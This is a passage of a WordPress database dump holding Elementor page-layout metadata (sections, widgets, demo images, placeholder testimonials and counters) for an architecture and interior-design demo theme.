3105,4752,'_elementor_pro_version','3.8.1'),(3106,4752,'_elementor_css','a:6:{s:4:\"time\";i:1685009833;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3107,4753,'_wp_page_template','elementor_header_footer'),(3108,4753,'_elementor_edit_mode','builder'),(3109,4753,'_elementor_template_type','wp-page'),(3110,4753,'_elementor_version','3.8.1'),(3111,4753,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3112,4753,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3113,4753,'_elementor_pro_version','3.8.1'),(3114,4753,'_elementor_css','a:6:{s:4:\"time\";i:1685009833;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3115,4754,'_wp_page_template','elementor_header_footer'),(3116,4754,'_elementor_edit_mode','builder'),(3117,4754,'_elementor_template_type','wp-page'),(3118,4754,'_elementor_version','3.8.1'),(3119,4754,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top 